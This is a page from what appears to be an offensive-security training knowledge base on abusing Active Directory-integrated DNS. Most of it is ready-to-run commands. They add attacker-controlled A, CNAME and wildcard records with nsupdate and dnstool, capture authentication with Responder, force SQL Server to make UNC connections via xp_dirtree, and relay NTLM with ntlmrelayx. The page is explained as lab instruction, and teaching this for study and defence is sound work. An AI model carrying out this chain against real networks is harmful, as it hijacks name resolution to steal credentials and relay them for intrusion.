Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 02. Protocols / DNS / ADIDNS

Attack

ADIDNS abuse means writing DNS records into an AD-integrated DNS zone. Once we control a record, we control where clients go when they resolve that name. That is enough to collect authentication, feed relay attacks, redirect application traffic, or create believable infrastructure names for later movement.

Variables

export DOMAIN=ootw.local
export DC=10.10.10.200
export ATTACKER=10.10.10.100
export USER=student
export PASS='student'

Check existing records

adidnsdump -u "$DOMAIN\\$USER" -p "$PASS" ldap://$DC -r
dig @$DC fileshare.$DOMAIN A +short

Kerberos setup

echo "$PASS" | kinit "$USER@${DOMAIN^^}"
klist

Add a record with secure dynamic update

nsupdate -g
server 10.10.10.200
zone ootw.local
update add fileshare.ootw.local 60 A 10.10.10.100
send
quit

Verify

dig @$DC fileshare.$DOMAIN A +short
nslookup fileshare.$DOMAIN $DC

Add a record with krbrelayx dnstool

python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action add --record fileshare --data $ATTACKER $DC
dig @$DC fileshare.$DOMAIN A +short

Use the record for capture

sudo responder -I eth0

Force a UNC authentication path

EXEC master..xp_dirtree '\\fileshare.ootw.local\share',1,1;
EXEC master..xp_fileexist '\\fileshare.ootw.local\share\file.txt';

Use the record for relay

ntlmrelayx.py -tf targets.txt -smb2support

Then trigger the victim to resolve and connect to the attacker-controlled name.

\\fileshare.ootw.local\share
http://fileshare.ootw.local/

CNAME option

python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action add --record intranet --type CNAME --data fileshare.ootw.local $DC
dig @$DC intranet.$DOMAIN CNAME

Wildcard option

python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action add --record '*' --data $ATTACKER $DC
dig @$DC definitely-not-real.$DOMAIN A +short

Delete with secure dynamic update

nsupdate -g
server 10.10.10.200
zone ootw.local
update delete fileshare.ootw.local A
send
quit

Delete with dnstool

python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action remove --record fileshare $DC

python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action remove --record intranet $DC

python3 dnstool.py -u "$DOMAIN\\$USER" -p "$PASS" --action remove --record '*' $DC

Notes

Use names that make sense in the environment.
Use short TTL values during labs.
Wildcard records are noisy and can break normal name resolution assumptions.
Do not overwrite real production records unless the exercise explicitly requires it.
Always verify with the target DNS server, not with a cached local resolver.
ADIDNS write is not the end goal. The value comes from what authenticates to the name after the record exists.